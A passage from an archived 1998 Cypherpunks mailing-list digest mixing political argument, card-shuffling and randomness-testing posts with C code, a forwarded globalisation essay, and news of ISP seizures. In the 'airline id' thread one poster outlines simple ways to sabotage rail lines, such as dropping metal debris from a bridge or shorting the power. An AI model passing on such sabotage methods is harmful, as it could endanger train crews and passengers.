doing by some people who should know better.  Everybody knows that the
CPSU or the Nazis or Bokassa or Idi Amin or the Ba'athists are or were
tyrants who ruined their countries and  lot more besides.  The very fact
that some people who once had political credibility,  like Thatcher or
Bush, support Pinochet is exactly the reason why he should be tried. We
need to draw a line between tolerable and intolerable government and put
his lot on the other side of it.

You have to know what the threats to liberty are. Old Soviet-style
"Communism" is hardly on the menu in any European  or North American
country these days and out-and-out looney Naziism isn't either (but that
doesn't mean we shouldn't keep our eyes open)  Our direct problems are
interfering governments, bad measures taken for good ends, corporate
power over private individuals, business power over workers and
customers,  and "law and order" (or the "War against
Drugs/Paedophiles/Communists/Dangerous Dogs/Liberals/Scroungers" or
whatever). Thin end of the wedge, slippery slope, foot in the door and
all that.  And even if Pinochet's ends my have been good his means were
as bad as they come.

His sort of ultra-nationalist, militarist authoritarian government that
pays lip service to libertarianism whilst using brutal methods to
enforce conformity, obedience and uniformity is still a threat today. It
bubbles under the surface in the blue-rinse wing of the British Tory
Party, and is quite explicity the line of the French Front National (the
British National Front are genuine Nazis, and pretty marginalised, but
the FN get real votes in France)   And when they get the upper hand then
the cattle-prod wielders and the toe-nail-pullers and the death squads
come out of the woodwork.   Margaret Thatcher wasn't any kind of
fascist,  but the differences are quantitative, not qualitative.  She
wasn't so far from Pinochet, Pinochet wasn't so far from Franco and
Franco wasn't so far from hell.

Ken Brown (whose bosses not only have nothing to do with this note &
wouldn't approve of it if they did, but probably voted for some of the
people the first draft ranted against)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 29 Oct 1998 20:42:00 +0800
To: nobody@replay.com>
Subject: RE: airline id
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F853F@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Various anonymes and Joel O'Connor discussed sabotaging trains -
presumably in order to force 

>>you flew to.  Even with trains, all's it will take is one bomb and 
>> youbetter believe security will be pumped up as high as it is 
>> with airlines. 

> Naaah, you pull rail-spikes to get trains, no big ba-da-boom required.
> And it does happen.
> 
> 
Actually you just put something on the  line. It happens all the time.
If a fast train hits it there can be big problems.  

Even a small obstacle (like a plastic rubbish bag with rubbish in it)
will cause a train to stop if it is seen. (Trains can't swerve). That
just causes inconvenience, unless of course you put something conductive
down that shorts out the power - that has a (small) chance of causing a
serious accident and a (big) chance of disrupting all rail traffic for
miles around for hours. A sort of occasionally fatal denial of service
attack.  It appeals to 14 year olds. You too can make 75,000 people late
for work, cause 30,000 pounds worth of damage and possibly kill a train
driver. 

In fact it is so easy to do (all you need to find is a bridge over the
line & a time when no-one is looking, and heave over  a stolen
supermarket trolley or an old fridge door from a dump, or any other bit
of metal rubbish) it is almost surprising that it doesn't happen more
often. IIRC, the IRA never tried to disrupt train traffic into or out of
London by putting things on the lines, always by bomb scares in
stations. There was one real bomb on a train,  went off just after it
arrived at Victoria, killed a couple of people. It was a train I
regularly used, although I usually travelled later in the day. It got
much harder to put bombs on trains, or in stations, after that. The main
fixes were removing the litter bins from around stations  (it took the
IRA to teach the messy English to clean up after themselves) and getting
people to report unclaimed packages and then evacuating trains when they
were found. If you leave yout bag on the train  they stop the train.
This makes people angry. So there is social pressure to not leave
packages lying around on, or near,  trains.  So if you want to plant a
bomb on a crowded train and not get blown up yourself you have a
problem. On trains, unlike planes, you keep your luggage with you.

Also people *like* trains. They are cute. Even in America you have
hordes of trainspotters and steam enthusiasts and model-builders and all
the rest. It always amazes me that bookshops have more shelves of
hobbyist books about trains than about cars, but only about 15% of the
population regularly travel by train and about 60% by car. (In England -
I guess in the USA that's more like 5% and 85% - and before you say that
that last figure is too low remember there are an awful lot more
disabled, vey old, very sick or imprisoned people than most of us notice
- I guess that car users in the USA include just about everyone capable
of using a car, with the possible exception of the inhabitants of some
parts of very big cities)

Back to the point - the reason you need id to travel on a plane is
because people are scared of planes. Especially they are scared of them
falling out of the sky, depressurising or catching fire.  When something
goes wrong with a plane everybody can die very quickly.  When an
accident happens to a train it usually just comes to a halt. They don't
have heaps of fuel on them (except if you are on an line that is still
back in the diesel age - and even then the fuel is usually all in one
location, separated from the passengers) You mostly don't die whan a
train crashes, or even blows up.

Repressive laws get popular support from people who are scared. People
are scared of plane crashes so they put up with  -no, they mostly
applaud or even demand -  treatment  they wouldn't stand for anywhere
else. People aren't scared of trains.  

Nobody's scared of cryptography - well, nobody wh hasn't received the
NSA corporate injection - but some peope are scared of
drugs/paedophiles/terrorists etc, so thats the way in for the jackboots.
To oppose it we need to reduce fear. 


Ken Brown

(who prefers bicycles to trains but had to use the train to get to work
today because  of a broken spoke he is incapable of fixing. He only does
software)

> ----------
> From: 	Anonymous[SMTP:nobody@replay.com]
> Sent: 	28 October 1998 17:36
> To: 	cypherpunks@toad.com
> Subject: 	airline id
> 
> At 12:43 PM 10/27/98 -0800, Joel O'Connor wrote:
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
>   
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 21:54:54 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Shuffling (fwd)
Message-ID: <199810291325.HAA19001@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Oct 1998 22:10:08 -0800
> From: Alex Alten <Alten@home.com>
> Subject: Re: Shuffling

> The concept of swapping to get a random string of bits is very interesting.
> >From what I understand when one shuffles a deck of 52 cards 7 or more times
> the card order becomes unpredictable e.g. random.

Only if it is a 'fair' shuffle. There are poker players I've met who could
put a given card anywhere in the deck after 4-5 shuffles.

>  The shuffle must be
> what is called a "near perfect" shuffle.

Perfect for who? Idealy the 'perfect' shuffle (if I understand your meaning
of perfect) would be for each card in each deck-half to interleave 1-to-1.
This does not produce random anything, it does make it very hard for people
to count cards, which is why you shuffle - not to create a necessarily
random ordering of the cards, just so mis-ordered nobody can remember what
the sequence was and predict reliably what the sequence will be. This is
incredibly important in games like poker or rummie where the cards pile up
and players can see the sequence (and if they can remember it use it).

This is also the reason that all games involving shuffled cards strictly
call for a neutral party to shuffle and deal, falling back to the players
only for 'friendly' games. Really smart 'amateur' players as you call them
also make sure that he who deals is not he who anties first.

I've never quite understood where this 'shuffle equal random' theory so 
many people have comes from (historicaly). But it is fun to play against
them because they also (usualy) only shuffle the cards once to twice before
a deal.

Even un-even shuffles aren't prevention from short-sequence card counters.
I impliment this when I play poker, it's helpfull to figure out how many
cards to draw because it's possible to estimate the 'distance' between a
short set of cards (eg a royal flush) after the shuffle.

> In other words the cards can't
> strictly alternate from each hand (with a half deck each), but must be 
> slightly random, in the sense that sometimes 2 or 3 cards may drop from a
> hand before a card drops from the other hand.

Unfortunately, professional croupie's don't practice for this. They practice
for a perfect inter-leave.

>  An amateur shuffle, like
> the one I perform, where the cards clump as they drop, may require 100's 
> of iterations before the order becomes totally unpredictable.  BTW, if
> I remember correctly the number of people in the world who can execute a 
> perfect shuffle at a professional rate (about 8 times a minute?) 
> consistently is somewhat less than 30.

8 time a minute? That's a pretty slow shuffle. Where did you get this number
from? A really quick proffessional shuffle doesn't take 3 seconds.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 22:05:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: update.399 (fwd)
Message-ID: <199810291330.HAA19060@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Oct 1998 10:48:06 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.399

> NONLOCALITY GETS MORE REAL.  "Bell's Inequalities," the
> set of mathematical relations that would rule out the notion that
> distant quantum particles exert influences on each other at
> seemingly instantaneous rates, have now been violated over record
> large distances, with record high certainty, and with the elimination
> of an important loophole in three recent experiments, further
> solidifying the notion of "spooky action at a distance" in quantum
> particles.  At the Optical Society of America meeting in Baltimore
> earlier this month, Paul Kwiat (kwiat@lanl.gov) of Los Alamos and
> his colleagues announced that they produced an ultrabright source
> of photon pairs for Bell's inequality experiments; they went on to
> verify the violation of Bell's inequalities to a record degree of
> certainty (preprint at p23.lanl.gov/agw/2crystal.pdf). Splitting a
> single photon of well-defined energy into a pair of photons with
> initially undefined energies, and sending each photon through a
> fiber-optic network to detectors 10 km apart, researchers in
> Switzerland (Wolfgang Tittel, Univ. Geneva,
> wolfgang.tittel@physics.unige.ch) showed that determining the
> energy for one photon by measuring it had instantaneously
> determined the energy of its neighbor 10 km away--a record set by
> the researchers last year but now demonstrated in an improved
> version of the original experiment. (Tittel et al., Physical Review
> Letters, 26 October 1998.) A University of Innsbruck group
> performed Bell measurements with detectors that randomly switched
> between settings rapidly enough to eliminate the "locality loophole,"
> which posited that one detector might somehow send a signal to the
> other detector at light or sub-light speeds to affect its reading. 
> (Weihs et al., upcoming paper in Phys. Rev. Lett., website at
> http://www.uibk.ac.at/c/c7/c704/qo/photon/_bellexp/)

> TUMOR GROWTH CAN BE FRACTAL.  A curve is fractal if when

> CORRECTIONS.  Update 397---Among nuclei for which gamma


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Thu, 29 Oct 1998 21:39:22 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: RE: airline id
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F853F@MSX11002>
Message-ID: <Pine.LNX.3.95.981029075020.11370A-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain



>  but some peope are scared of
> drugs/paedophiles/terrorists etc, so thats the way in for the jackboots. 
> To oppose it we need to reduce fear. 

Thats the most interesting POV I've ever heard
of in these discussions, seems like for the most part, 
we counter fear arguments with other fear arguments,
Never saw this before. Bears more examination.

> 
> Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Oct 1998 23:16:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: A nationhood under seige: Is the nation obsolete?
Message-ID: <v04020a09b25e1fa42fcd@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Holy shit. The Fourth Estate figures it out.

Of course, the answer to the question, "Omigawd! There's gonna be no
nation-states, dude!", is, the same answer to the question "Egad! The
Church has no more earthly power!"

Which is, "So?".

:-).

Mort a le infame, as Voltaire used to say...

Cheers,
Bob Hettinga

--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Thu, 29 Oct 1998 06:41:34 -0500
From: Richard Sampson <rjsa@sprintmail.com>
Organization: Unknown Organization
MIME-Version: 1.0
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>
Subject: IP: A nationhood under seige: Is the nation obsolete?
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: Richard Sampson <rjsa@sprintmail.com>

A nationhood under seige: For 350 years, the world has been governed by
the pri
A nationhood under seige: For 350 years, the world has been governed by
the principle of national sovereignty, but the new global economy
respects no national borders, laws, or interests. Is the nation
obsolete?<
Three and a half centuries after the nations of the world won the power
of self-rule, a new force has come along to erode that power and
undermine the democratic rights of their citizens.
That force is the global economy, which is relocating the economic
decisions that frame the lives of citizens far beyond the reach of the
voters and their voice.

There's a sort of cruel historical irony here, that at the very moment
when liberal democracy has finally triumphed over all rival systems of
government, the power of markets - the other half of the post-Cold War
triumph - has come along to leech that democracy of much of its
meaning.

This weekend is the 350th anniversary of the Peace of Westphalia, a
treaty signed in 1648 by the Holy Roman Empire with France and Sweden
and, especially, with the princes of the various German principalities.
This treaty not only ended the Thirty Years' War, but also severely
limited the ability of the Empire and the church of Rome to intervene
in the affairs of the German principalities.

In other words, Westphalia proclaimed the sovereignty of the
principalities, the right of the princes to rule their territories
without outside interference.

This idea of sovereignty has echoed down the three and a half centuries
since then and is the basis both of self-government and of
international relations.

Considering all the massacres, pogroms, persecutions, gulags and
holocausts of the past 350 years, this principle of sovereignty leaves
something to be desired. But it's what we have, the magnetic pole of
the international system.

More important for those lucky enough to live in democracies,
Westphalia is the basis of democratic self-rule, the idea that the
average citizen has a say in the decisions that affects his or her
life. Somebody else may make the decisions, but citizens have the right
to cast their votes and state their opinions, confident that these vote
and opinions will be heard by the decisionmaker who, one way or
another, must pay attention.

It's this right and this confidence that are vanishing in the face of
the global economy, which is the one really new thing under the sun.

The reason is that democracy is national and so are its institutions.
Governments are national and their power to make and enforce laws is
national. The power of the vote is felt at national levels, but not
beyond.

But the nation-based industrial economy that underwrote the growth of
democracy is being replaced by a global economy, powered by global
capital markets and global communications, answering to the needs and
demands of global corporations and investors who can and do ignore
frontiers.

In short, an extremely important part of public life _ the economy _ is
going global in a way that politics and government have not, and so is
moving beyond any kind of democratic control.

As Americans and the rest of the world have learned in the past year,
impersonal global markets can and do cast instant judgments on entire
societies, dictate the spending decisions of government and unravel the
social contracts that used to bind corporations with their employees
and their societies.

Peter Drucker, the founder of modern management, has written that we
are in an ''age of social transformation,'' one of those historical
eras that happen ''every few hundred years,'' when, ''within a few
short decades, society rearranges itself _ its worldview; its basic
values: its social and political structure: its arts: its key
institutions.''

Such transformations, like the global economy itself, are not innately
evil forces. Instead, they are amoral but immensely powerful movements
that change civilizations. But all such movements are created by humans
and potentially controllable by humans, for good or for ill.

A century after the Industrial Revolution, societies tamed the economic
forces generated by this revolution and turned them into the market
democracy that enhanced the past 50 years of Western history. No such
taming of the Global Revolution _ or even a debate on how to do it _
has begun yet.

The old economy was built on a national consensus that economies exist
for societies, not the other way around. Over the past half-century,
the democracies created social markets _ capitalist structures that
insisted the companies share the cost of citizenship.

Tax laws required companies to pay their fair share to the places where
they made their money. Other laws gave rights to unions, protected
worker safety and the environment, and mandated good health and pension
plans. Companies accepted these laws, however grudgingly, if only
because it cost them no competitive edge: all their rivals, subject to
the same laws, faced the same costs.

Now, not only capital markets have escaped into cyberspace, beyond the
reach of national regulations. There are about 50,000 global
corporations who see the globe as a single market and ignore national
borders and regulations.

These are no longer multinationals, with most of their operations in
one country but with a few foreign branches. The global economy is
being driven by global corporations who see the globe as a unit. They
have their headquarters in one country, research and development in
others, accounting in still another, manufacturing scattered across the
world, with sales wherever there are customers.

These companies have gone global because, with the advent of global
communications, they can. But in the process, they have left behind
their old home and its laws.

Too often, companies now pay taxes and wages where the rates are lowest
and the laws loosest. In many countries, environmental or benefits
regulations are nonexistent. Many other countries are willing to waive
them for companies that will invest there.

In this atmosphere, businesses argue they can no longer afford the
social costs imposed on them by society, when their rivals may be
operating halfway around the world, in a place where the average wage
is $1 per day and environmental laws don't exist. Either, they say,
they must be allowed to break the social contract, busting unions and
negotiating easier regulations and dumping health and pension plans, or
they must go abroad themselves.

Often they do both. Good jobs go away and the ones that are left
somehow pay less, are more unstable and are less likely to come
equipped with pension or health plans.

Wolfgang Reinicke, a senior economist at the World Bank, has written
that this is an attack on ''internal sovereignty,'' the ability of an
elected government to really govern.

The laws remain intact, but the ability to enforce them disappears.
Government exists but its effectiveness and efficiency are eroded. The
economy rolls on, but the public's ability to insist that it benefit
society is eroded. Elections are held and votes counted, but the power
of that vote to promote particular policies wobbles and wanes.

The economic rights won by citizens over the centuries, from collective
bargaining to decent wages to job stability to pensions, often
depending on the power of national governments to enforce them. As this
power withers, so do the rights.

Small wonder that government is held in such low esteem these days and
politics derided. A government that cannot enforce its own laws is a
government fit only for scandals and other sideshows. The main event is
going on somewhere else, and neither Washington nor its subjects knows
where it is.

There oughta be a law, a global one replacing the national laws and
bringing this economy back under democratic control. In fact, there are
laws, lots of them, with more being written every day, but the voters
aren't being asked to help write them.

Around the world, bureaucrats, experts, lawyers and lobbyists are
writing a new web of global regulations, on stock markets, accounting,
banking, investment, even auto safety and drug trials. These talks
aren't exactly secret but the government isn't going out of its way to
publicize them. They are highly technical and, frankly, pretty boring.

But they're important. They're writing the rule book for the 21st
Century. New global tax laws haven't been written yet, and
environmental or labor regulations are barely a gleam in a bureaucrat's
eye. But they'll be written someday, if only because the global economy
otherwise will be a jungle.

But when they are written, they'll look a lot like the regulations
already framed. That is, they will be technical exercises, focused on
efficiency and the well-being of corporations, not on democracy or the
public health.

Nations and corporations have different interests. Nations want to
raise the living standards of their citizens, while corporations want
to raise their profits. The glory of the past 50 years rests on the
creation of the social market, with the drive of capitalism tempered by
the needs of society, enabling both to thrive.

This 20th-Century thrust has focused on the rights of citizens, as
individuals or as classes. The new rule-making focuses on the safety
and efficiency of markets and corporations. They are making the world
more secure and predictable for investment and trade, which is vital
for the creation of an honest market. But it caters to the needs of
global actors, not the folks at home.

De-regulation nationally is being replaced with re-regulation globally.
But in the process, governments are giving away power from national
bodies to global institutions. But governments exist by democratic
sufferance. These global bodies do not.

The growth of the global economy requires global governance. But
increasingly, as Reinicke has written, this is turning into
''governance without government,'' public functions wielded by bodies
with no public control.

Pat Buchanan, the commentator and onetime presidential candidate, has
called for a ''new economic nationalism'' that, essentially, calls for
derailing the global economy with barriers on trade, limits on
immigration and an all-around isolationism that, apart from its basic
selfishness, is a national solution to a global problem and, hence,
futile.

The right answer is to recognize that the global economy exists and
won't go away, and to tame and temper it with a new social market,
composed of new laws and rules in which the public, for a change, has a
voice. For a start, the government should never negotiate new global
rules that supersede national rules without making a sort of democratic
impact statement on what this will mean to the rights of citizens.

This is a ''new economic internationalism'' in which American
democratic institutions would cooperate with the democratic
institutions of other countries to recapture the sovereignty of both.

(This is an adaptation of the Richard W. Leopold Annual Lecture that
R.C. Longworth, a Chicago Tribune senior writer, delivered at
Northwestern University this month.)

KRT PERSPECTIVE is a forum for essays by staff writers from
contributing papers.

(c) 1998, Chicago Tribune.

-0-

Visit the Chicago Tribune on America Online (keyword: Tribune) or the
Internet Tribune at http://www.chicago.tribune.com/

Distributed by Knight Ridder/Tribune Information Services.

AP-NY-10-28-98 0611EST<   -0-
By R.C. Longworth
Chicago Tribune


News provided by COMTEX.
[!COMMUNITY] [!FINANCE] [!WALL+STREET] [ACCOUNTING] [BANKING] [BOOK]
[CONTRACT] [DEMOCRACY] [ECONOMY] [ENVIRONMENT] [FRANCE] [GOVERNMENT]
[HEALTH] [IMMIGRATION] [INVESTMENT] [KNS] [LABOR] [MANUFACTURING]
[MARKET] [MONEY] [NEWS] [NEWSGRID] [POLITICS] [RATES] [REGULATIONS]
[RESEARCH] [SALES] [STANDARDS] [SWEDEN] [TAXES] [TRADE] [TREATY]
[UNIONS] [USA] [WAR] [WASHINGTON] [WORLD+BANK]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Fri, 30 Oct 1998 01:32:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Electronic March
In-Reply-To: <199810290400.UAA14741@netcom13.netcom.com>
Message-ID: <Pine.SOL.3.91.981029094403.1051A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



>      A US grass-roots group has kicked off the Billion Byte March, calling
> itself the first Internet march on Washington. The aim is to send a million
> emails to Congress in January, on the day of the State of the Union
> Address. Why? To reform America's social security system. See
> http://www.march.org  
>   

Not bloody likely.  Inside the social (in)security fund you will find
a big IOU to the tune of many billions of dollars.  In fact, to the tune
of the entire value of the SS fund.

If they end up "saving" social insecurity its most likely that they
will stick to the same game as Doritos (paraphrased)

"Spend all you like...we'll print more!"

To understand why SS has never really been in jeopardy, you must understand
the function of a central, fractional-reserve banking system.  Since
the Fed is a lender of last resort to the government, and since the
US federal government is never likely to voluntarily let social 
(in)security die they will simply print more money.

I don't mean literally print more money.

I mean the fed government sells bonds to cover the difference.  If
the bond market won't absorb it, the federal reserve is bound by 
contract t absorb it.

Just some entries in a ledger to them.  Just some inflation, hidden
taxes and future interest payments to you.

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 30 Oct 1998 01:18:00 +0800
To: cypherpunks@cyberpass.net
Subject: Two ISPs Seized Over Usenet Content
Message-ID: <199810291636.KAA12618@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



New York State Attorney General Dennis Vacco, who is running for
re-election, is crowing and posturing this morning over having seized
two ISPs, Dreamscape in Syracuse, and Buffnet in West Seneca, over the
content of the newsgroup alt.binaries.pictures.pre-teen, thus making a
small dent in the distribution of "filth" to ignorant citizen-units.
 
A running gag in abpep-t for the last several years has been for
newsgroup posters to identify themselves as various faculty belonging
to a mythical "Pedo University" when responding to trolls.  Vacco
believes this imaginary organization to be a "International Child
Pornography Ring" which he has broken up.
 
13 individuals in various countries were also arrested on various
child pornography possession, trading, and promotion charges, related
to activity in the newsgroup, and 34 are still under "investigation",
according to this morning's AP wire.
 
alt.binaries.pictures.erotica.pre-teen continues merrily onwards, and
is presently discussing the arrests and seizures, minus a few of its
regular participants.
 
While the loss of two small ISPs and a dozen or so patrons is unlikely
to bring the uncensorable worldwide Usenet to its knees, this appears
to be a small first step towards eroding the legal notion that common
carriers are immune from liability over Usenet content.
 
exerpts...
 
  NEW YORK (AP) -- Authorities say they have broken up an
  international child pornography ring dubbed ``Pedo
  University'' in which suspects swapped sexually explicit
  information, pictures and video online.
 
  ...
 
  Thirteen people were in custody and more arrests were
  expected.
 
  As many as 34 people were still under investigation. New
  York state police seized two Internet providers, Dreamscape
  ISP in Syracuse and Buffnet.net ISP in West Seneca.
 
  ...
 
  Both allegedly carried Pedo University news groups, a type
  of electronic bulletin board similar to a chat room.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 30 Oct 1998 01:45:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Shuffling (fwd)
Message-ID: <199810291716.LAA19879@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: iang@cs.berkeley.edu (Ian Goldberg)
> Subject: Re: Shuffling (fwd)
> Date: 29 Oct 1998 16:16:41 GMT

> The "7 times" theorem uses the following model of a shuffle:
> 
> o The deck is cut into two parts, with the number of cards in each piece
>     binomially distributed (with mean 26, of course).

> o The resulting deck is then achieved by having cards fall from one or the
>     other of the two parts; a card will fall from one of the parts with
>     probability proportional to the number of cards remaining in the part.

The only problem I see with this model, re real card decks, is that the
probability for a given card to fall to the top of the shuffled pile isn't
related in any way to the number of cards in either stack in a real-world
shuffle.

It also doesn't address the problem of 'clumping' where a group of cards (ie
royal flush) stay together through the shuffling. This is the reason that
real dealers try for a 1-for-1 shuffle each time.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lynn.Wheeler@firstdata.com
Date: Fri, 30 Oct 1998 17:06:18 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: log files (was: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
Message-ID: <882566AC.006D5F01.00@lnsunr02.firstdata.com>
MIME-Version: 1.0
Content-Type: text/plain



in fact, large number of security studies show that variety of operations
are at greatest risk from insiders.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Fri, 30 Oct 1998 17:05:45 +0800
To: coderpunks@toad.com
Subject: bug in my Maurer code; retraction of claim; ref
Message-ID: <3.0.5.32.19981029122825.007d1cd0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




There was a numerical bug in the C code for Maurer's Univ. Stat. Test
for Randomness which I posted.  The "float" variable "Sum" 
should be "double".  This will cause an incorrect input-size dependence
for large >40Mbyte files.

Measuring (with the fixed version) the output of a block cipher in feedback
mode, I find that it DOES NOT differ from truly nondeterministic noise, as
I had claimed.  The difference I had observed was due to a larger sample
size for my cipher-noise.  Boy do I feel stupid.

Needless to say, sorry about any inconvenience.

The fixed code follows at the bottom.  This version also spits out
an early estimate after a million samples; this turns out to be
very close to the final value for (homogenous) large samples.


Also:

I recently found the following amendment to Maurer's work
at http://www.eleves.ens.fr:8080/home/coron/escience.html#1

Abstract. Maurer's universal test is a very common randomness test, capable
of detecting a wide gamut of statistical defects. The algorithm is simple
(a few Java code lines), flexible (a variety of parameter combinations can
be chosen by the tester) and fast.
Although the test is based on sound probabilistic grounds, one of its
crucial parts uses the heuristic approximation:
c(L,K) = 0.7 - 0.8/L + (1.6 + 12.8/L)K-4/L
In this work we compute the precise value of c(L,K) and show that the
inaccuracy due to the heuristic estimate can make the test 2.67 times more
permissive than what is theoretically admitted.
Moreover, we etablish a new asymptotic relation between the test parameter
and the source's entropy.
09/08/98 - Jean-Sbastien Coron





.....................................


/*
UELI.c
28 Oct 98

This implements Ueli M Maurer's
"Universal Statistical Test for Random Bit Generators"
using L=16

Accepts a filename on the command line;
writes its results, with other info, to stdout.

Handles input file exhaustion gracefully.

Ref: J. Cryptology v 5 no 2, 1992 pp 89-105
also on the web somewhere, which is where I found it.

-David Honig
honig@sprynet.com


Built with Wedit 2.3, lcc-win32
http://www.cs.virginia.edu/~lcc-win32


26 Sept CP Release
Version Notes:

	This version does L=16.  It evolved from an L=8 prototype
	which I ported from the Pascal in the above reference.

	I made the memory usage reasonable
	by replacing Maurer's "block" array
	with the 'streaming' fgetc() call.


27 Oct 98 compiled under Sun cc OK if C++ stuff taken out..
28 Oct 98 made "Sum" into a double, from float; fixes
		a bug found with larger (40M files); reposted
		with retraction.




Usage:
	ULI filename
	outputs to stdout

*/

#define L 16		// bits per block
#define V (1<<L)	// number of possible blocks
#define Q (10*V)    // at LEAST 10 * V, to assure each block seen
#define K (100*Q)   // at LEAST 100 * Q, as large as possible
#define MAXSAMP (Q + K)

#include <stdio.h>
#include <math.h>


int main( int argc, char **argv )
{
FILE *fptr;
int i;
int b, c;
int table[V];
double sum=0.0;
int run;

// Human Interface
printf("UELI 27 Oct 98 double-precision, with early value\n L=%d %d %d \n",
L, V, MAXSAMP);
if (argc <2)
	{printf("Usage: ULI filename\n"); exit(-1); }
else
	printf("Measuring file %s\n", argv[1]);

// FILE IO
fptr=fopen(argv[1],"rb");
if (fptr == NULL) {printf("Can't find %s\n", argv[1]); exit(-1); }

// INIT
for (i=0; i<V; i++) table[i]=0;
for (i=0; i<Q; i++)	{
	b= fgetc(fptr)<<8 | fgetc(fptr);
	table[ b ]=i;
}

printf("Init done\n");

// COMPUTE
run=1;
for (i=Q;  run && i<Q+K; i++)
	{
	// COMPOSE A 16-bit quantity
	b=fgetc(fptr);
	c=fgetc(fptr); if (c<0 || b<0) run=0;
	if (run) { b = b<<8 | c;
			sum += log( (double) ( i-table[b] ) ) ;
			table[ b ]=i;
		}

	if (i==1000000+Q)
	printf("Early measurement after %d samples = %g\n\n", i-Q, (sum/( (double)
(i-Q) ) ) /  log(2.0));

	}

	if (!run) printf("Premature end of file; read %d blocks.\n", i-Q);
	sum = (sum/( (double) (i-Q) ) ) /  log(2.0);    // i should be K if enough
samples
	printf("%s fTU= %g\n\n", argv[1], sum);
	printf("Expected value for L=16 is 15.167379 \n");

	// Add further interpretation/thresholding of the number of sigmas from
expected,
	// and include the fudge factors explained in the paper.


} // end











  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 30 Oct 1998 02:21:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Articles...  Micro jet engine for Wearable power?
Message-ID: <v04020a15b25e586ef134@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 29 Oct 1998 12:03:26 -0500
Date: Wed, 28 Oct 1998 09:50:40 -0500
